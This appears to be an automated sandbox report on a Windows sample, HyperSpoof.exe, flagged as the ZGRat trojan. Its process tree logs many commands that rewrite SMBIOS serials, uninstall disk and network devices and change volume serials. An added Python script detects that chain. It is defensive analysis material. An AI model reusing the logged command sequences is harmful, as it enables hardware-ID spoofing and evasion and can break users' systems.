Analysis

  • max time kernel
    70s
  • max time network
    70s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2024 01:19

Errors

Reason
Machine shutdown

General

  • Target

    HyperSpoof.exe

  • Size

    172KB

  • MD5

    ca27199cf4415233d9297b430dcf9924

  • SHA1

    8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4

  • SHA256

    71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

  • SHA512

    af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac

  • SSDEEP

    1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Runs commands through powershell.exe.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 30 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utility for controlling services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 60 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

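The process tree below records three hardware-identity spoofing primitives chained from one dropped executable: AMIDEWINx64.exe (AMI's DMI/SMBIOS editing utility) rewriting system and baseboard serials, DevManView.exe (the NirSoft tool behind the "Nirsoft" signature) uninstalling storage and WAN Miniport device nodes, and Volumeid64.exe (Sysinternals VolumeID) assigning new volume serials. The serial values follow the cmd.exe lines that precede them: `%RANDOM%` expands to an integer in 0–32767, so `%RANDOM%HP-TRGT%RANDOM%AB` becomes something like `13721HP-TRGT24587AB`. The script below is an added example, not part of this report or of the sample's own code: it runs simple detection logic over a handful of constructed process-creation events (image, parent image, command line) modelled on the tree, plus one constructed benign control event, and flags each primitive together with the PowerShell-to-Roaming launch chain. The switch set, device-name list and serial regex are taken only from what this report shows; all event data and rule names are assumptions made for the example.

```python
"""Hunting logic for the HWID-spoofing chain seen in this sandbox report.

Added example; the events below are constructed from the report's process
tree and are not sandbox output.  Feed real process-creation telemetry
(e.g. Sysmon event ID 1) into ProcEvent to use it for hunting.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


# AMIDEWIN switches present in the report's command lines; each one writes a
# DMI/SMBIOS field (system serial/version/SKU/UUID/manufacturer, baseboard
# manufacturer/serial/version, ...).  Only switches seen here are listed.
DMI_WRITE_SWITCHES = {"/SS", "/SV", "/SK", "/SU", "/SM", "/BM", "/BS", "/BV", "/PSN"}

# Device names/classes DevManView was told to uninstall in the report.
STORAGE_UNINSTALL = re.compile(
    r'/uninstall\s+"?(disk|scsi\\disk|usbstor|storage|swd\\wpdbusenum|wan miniport|[a-z]:\\)',
    re.IGNORECASE,
)

# Volumeid "<drive>: XXXX-XXXX" argument pair.
VOLUME_SERIAL = re.compile(r"\b([a-z]):\s+([0-9A-Z]{4}-[0-9A-Z]{4})\b", re.IGNORECASE)

# Serial shape produced by "<digit>%RANDOM%HP-TRGT%RANDOM%<suffix>" in cmd.exe
# (%RANDOM% is 0-32767, so at most five digits per expansion).
SPOOFED_SERIAL = re.compile(r"^\d{1,6}HP-TRGT\d{1,5}[A-Z]{2,3}$")


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dmi_write(ev: ProcEvent) -> tuple[str, str] | None:
    """Return (switch, value) when AMIDEWIN is invoked with a DMI-writing switch."""
    if not _base(ev.image).startswith("amidewin"):
        return None
    toks = ev.command_line.split()
    for i, tok in enumerate(toks):
        if tok.upper() in DMI_WRITE_SWITCHES:
            return tok.upper(), (toks[i + 1] if i + 1 < len(toks) else "")
    return None


def findings_for(ev: ProcEvent) -> list[str]:
    """All rule names (hypothetical labels) that fire on one event, in rule order."""
    out: list[str] = []
    base = _base(ev.image)
    if base.startswith("amidewin"):
        hit = dmi_write(ev)
        if hit:
            switch, value = hit
            out.append(f"dmi_write:{switch}")
            if SPOOFED_SERIAL.match(value):
                out.append("dmi_write:spoofed_serial_pattern")
    elif base == "devmanview.exe" and STORAGE_UNINSTALL.search(ev.command_line):
        out.append("storage_device_uninstall")
    elif base.startswith("volumeid"):
        m = VOLUME_SERIAL.search(ev.command_line)
        if m:
            out.append(f"volume_serial_change:{m.group(1).lower()}")
    # Launch chain from the report: powershell.exe -> dropped EXE in AppData\Roaming.
    if _base(ev.parent_image) == "powershell.exe" and "\\appdata\\roaming\\" in ev.image.lower():
        out.append("powershell_spawned_exe_from_roaming")
    # All three tools were staged under a Microsoft-looking ProgramData path.
    if ev.image.lower().startswith("c:\\programdata\\microsoft\\windows\\") and base.endswith(".exe"):
        out.append("tool_staged_in_programdata")
    return out


def triage(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """(event index, rule name) for every rule hit across the event list."""
    return [(i, f) for i, ev in enumerate(events) for f in findings_for(ev)]


def summarize(events: list[ProcEvent]) -> Counter:
    """Hit count per rule family (the part of the label before the colon)."""
    return Counter(f.split(":")[0] for _, f in triage(events))


# Constructed events modelled on the report's process tree (not sandbox output).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"'),
    ProcEvent(r"C:\ProgramData\Microsoft\Windows\Volumeid64.exe",
              r"C:\Windows\System32\cmd.exe",
              r"C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB"),
    ProcEvent(r"C:\ProgramData\Microsoft\Windows\DevManView.exe",
              r"C:\Windows\System32\cmd.exe",
              r'C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""'),
    ProcEvent(r"C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe",
              r"C:\Windows\system32\cmd.exe",
              r"C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB"),
    ProcEvent(r"C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe",
              r"C:\Windows\system32\cmd.exe",
              r"C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF"),
    # Constructed benign control: an admin listing devices, no /uninstall.
    ProcEvent(r"C:\Tools\DevManView.exe", r"C:\Windows\explorer.exe",
              r"C:\Tools\DevManView.exe /stext devices.txt"),
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print(dict(summarize(SAMPLE_EVENTS)))
```

The control event shows why the rules key on the arguments and the launch context rather than on the tool names alone: DevManView, VolumeID and AMIDEWIN are all legitimate administration utilities, and a bare image-name match would page on every technician's laptop. The staging path and the `powershell.exe` to `AppData\Roaming` chain are the cheapest signals to alert on first; the serial regex is specific to this sample's `%RANDOM%` template and should be treated as a sample-specific IoC, not a general rule.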
Processes

  • C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe
    "C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB
            5⤵
            • Executes dropped EXE
            PID:2236
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1284
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2268
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2276
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1684
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2892
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:576
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:572
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3028
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2836
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1820
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2428
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:276
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          • Loads dropped DLL
          PID:1588
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB
            5⤵
            • Executes dropped EXE
            PID:2028
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
          PID:2664
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213724HP-TRGT2567RV
            5⤵
            • Executes dropped EXE
            PID:2676
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
          4⤵
          PID:2252
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813724HP-TRGT2567SG
            5⤵
            • Executes dropped EXE
            PID:1656
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
          4⤵
          PID:1040
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
            5⤵
            • Executes dropped EXE
            PID:548
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
          4⤵
          PID:2804
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513724HP-TRGT2567SL
            5⤵
            • Executes dropped EXE
            PID:536
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
          4⤵
          PID:788
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413724HP-TRGT2567FA
            5⤵
            • Executes dropped EXE
            PID:1044
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
          4⤵
          PID:2272
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613724HP-TRGT2567FU
            5⤵
            • Executes dropped EXE
            PID:1696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
          4⤵
          PID:844
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313724HP-TRGT2567DQ
            5⤵
            • Executes dropped EXE
            PID:1444
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
          4⤵
          PID:1340
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713724HP-TRGT2567MST
            5⤵
            • Executes dropped EXE
            PID:1816
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
          4⤵
          PID:1764
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
            5⤵
            • Executes dropped EXE
            PID:1936
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          PID:1708
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13743HP-TRGT1522AB
            5⤵
            • Executes dropped EXE
            PID:2760
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
          PID:1516
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV
            5⤵
            • Executes dropped EXE
            PID:2772
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
          4⤵
          PID:1580
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG
            5⤵
            • Executes dropped EXE
            PID:2636
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
          4⤵
          PID:1564
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
            5⤵
            • Executes dropped EXE
            PID:2740
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
          4⤵
          PID:1700
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL
            5⤵
            • Executes dropped EXE
            PID:2664
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
          4⤵
          PID:2656
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413743HP-TRGT1522FA
            5⤵
            • Executes dropped EXE
            PID:2828
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
          4⤵
          PID:2820
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613743HP-TRGT1522FU
            5⤵
            • Executes dropped EXE
            PID:1036
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
          4⤵
          PID:2576
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313743HP-TRGT1522DQ
            5⤵
            • Executes dropped EXE
            PID:704
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
          4⤵
          PID:2676
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713743HP-TRGT1522MST
            5⤵
            • Executes dropped EXE
            PID:3024
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
          4⤵
          PID:2684
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
            5⤵
            • Executes dropped EXE
            PID:2252
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          PID:788
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13760HP-TRGT22496AB
            5⤵
            • Executes dropped EXE
            PID:2220
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
          PID:1572
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213760HP-TRGT22496RV
            5⤵
            • Executes dropped EXE
            PID:2288
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
          4⤵
          PID:844
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813760HP-TRGT22496SG
            5⤵
            • Executes dropped EXE
            PID:2492
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
          4⤵
          PID:1340
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
            5⤵
            • Executes dropped EXE
            PID:796
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
          4⤵
          PID:1652
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513760HP-TRGT22496SL
            5⤵
            • Executes dropped EXE
            PID:2480
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
          4⤵
          PID:556
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413760HP-TRGT22496FA
            5⤵
            • Executes dropped EXE
            PID:2428
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
          4⤵
          PID:1300
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613760HP-TRGT22496FU
            5⤵
            • Executes dropped EXE
            PID:1600
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
          4⤵
          PID:2372
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313760HP-TRGT22496DQ
            5⤵
            • Executes dropped EXE
            PID:2064
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
          4⤵
          PID:2156
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713760HP-TRGT22496MST
            5⤵
            • Executes dropped EXE
            PID:1488
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
          4⤵
          PID:900
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
            5⤵
            • Executes dropped EXE
            PID:1544
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0
          4⤵
          PID:2704
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0
            5⤵
            • Executes dropped EXE
            PID:2660
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A
          4⤵
          PID:1712
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A
            5⤵
            • Executes dropped EXE
            PID:1928
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: N5BO-COAU
          4⤵
          PID:2220
